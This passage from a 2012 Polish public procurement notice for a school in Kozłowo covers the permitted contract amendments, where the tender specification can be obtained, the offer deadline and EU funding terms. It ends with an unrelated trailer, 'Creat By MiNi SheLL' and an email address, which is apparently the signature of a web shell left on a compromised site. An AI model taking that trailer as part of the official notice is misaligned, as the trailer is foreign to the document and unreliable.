4.2 zmiana sposobu rozliczania umowy lub dokonywania płatności częściowych na rzecz wykonawcy;.
5.	Pozostałe zmiany
5.1   Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
5.2   Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu
5.3	Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim
przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.
5.4	Wstrzymanie realizacji zamówienia przez właściwe służby i organy na skutek następstw nieszczęśliwych wypadków przy pracy

6.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień
publicznych w szczególności:
6.1	ograniczenie przedmiotu świadczenia, jeśli taką możliwość przewidywała umowa
6.2	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np.   
          zmiana nr rachunku bankowego)
6.3	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między   
            Stronami;
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę lub nie bez podawania uzasadnienia odmowy. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkolno-Przedszkolny w Kozłowie,
Kozłowo 73B
13-124 Kozłowo
woj. warmińsko - mazurskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2012 godzina 10:00, miejsce: Zespół Szkolno-Przedszkolny w Kozłowie,
Kozłowo 73B
13-124 Kozłowo
woj. warmińsko - mazurskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com